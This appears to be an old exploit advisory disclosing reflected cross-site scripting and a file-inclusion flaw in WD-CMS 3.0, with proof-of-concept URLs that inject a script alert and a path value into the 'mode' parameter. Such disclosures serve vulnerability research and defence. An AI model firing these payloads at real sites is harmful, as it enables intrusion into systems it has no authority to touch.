WD-CMS 3.0 Multiple Vulnerabilities :

Date : 2010-01-01 Author : Sora
# Exploit Title: WD-CMS 3.0 Multiple Vulnerabilities
# Date: December 31st, 2009
# Author: Sora
# Software Link: http://www.webdiamond.net/cms.html
# Version: 3.0
# Tested on: Windows Vista and Linux (Backtrack 3)

---------------------------------------------------------------
> WD-CMS 3.0 Multiple Vulnerabilities
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/

--------------------------------------------------
# Program Description:
Based on a flexible PHP architecture, Web Diamond has developed a 100% browser-based database-driven Content Management System (CMS), which allows users to maintain full control of their website without any technical knowledge of programming by using a simple user friendly admin panel. The main benefit and the flexible strength of our CMS is its ability to separate design, structure and content. Each area of the site can be recreated and adjusted independent of the other areas.

Key features include:
1. User friendly secure admin interface
2. Access levels
3. Powerful File Manager
4. Multi languages
5. Dynamic templates
6. Search engine friendly
7. Site tools
8. Add-on modules


# Vulnerability Description:
The CMS named WD-CMS developed by Web Diamond LTD has multiple vulnerabilities.

Vulnerabilities: XSS and remote file access.

http://www.site.com/index.php?l=eng&mode=%3Cscript%3Ealert%28%22XSS%20by%20Sora%22%29%3C/script%3E

# Code/Proof of Concept (PoC):

XSS Proof of Concept:
http://www.site.com/index.php?l=eng&mode=%3Cscript%3Ealert%28%22XSS%20by%20Sora%22%29%3C/script%3E

Remote File Access Proof of Concept:
http://www.site.com/index.php?l=eng&mode=./index (as it adds .php at the end)

# Greetz:
Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, Revelation, and Max Mafiotu!

C1

 

C2

 

C3